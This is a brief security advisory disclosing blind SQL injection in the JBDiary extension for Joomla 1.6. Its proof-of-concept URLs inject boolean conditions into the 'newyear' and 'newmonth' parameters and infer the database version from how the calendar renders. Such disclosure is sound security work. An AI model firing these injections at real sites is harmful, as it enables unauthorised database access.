1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
[~]>> ...[BEGIN ADVISORY]... !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> TITLE: Joomla (JBDiary) BLIND SQL Injection Vulnerabilities [~]>> LANGUAGE: PHP [~]>> DORK: N/A [~]>> RESEARCHER: B-HUNT3|2 [~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com [~]>> TYPE: COMMERCIAL [~]>> PRICE: 5€ [~]>> TESTED ON: Demo Site !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> DESCRIPTION: Multiple input vars are vulnerable to SQL code injection. [~]>> AFFECTED VERSIONS: Confirmed in 1.6 but probably other versions also. [~]>> RISK: High/Medium [~]>> IMPACT: Execute Arbitrary SQL queries !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> PROOFS OF CONCEPT: [~]>> http://server/?newyear=[SQL]&newmonth=[SQL] [~]>> -----{VAR NEWYEAR}----- [~]>> {RETURN TRUE} [~]>> http://server/?newyear=2011'+and+substring(@@version,1,1)=4%23&newmonth=01 [~]>> {RETURN FALSE} [~]>> http://server/?newyear=2011'+and+substring(@@version,1,1)=5%23&newmonth=01 [~]>> -----{VAR NEWMONTH}----- [~]>> {RETURN TRUE} [~]>> http://server/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=4%23 [~]>> {RETURN FALSE} [~]>> http://server/?newyear=2011&newmonth=01'+and+substring(@@version,1,1)=5%23 [~]>> Note: True or False is visible in calendar's colors. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! [~]>> ...[END ADVISORY]... |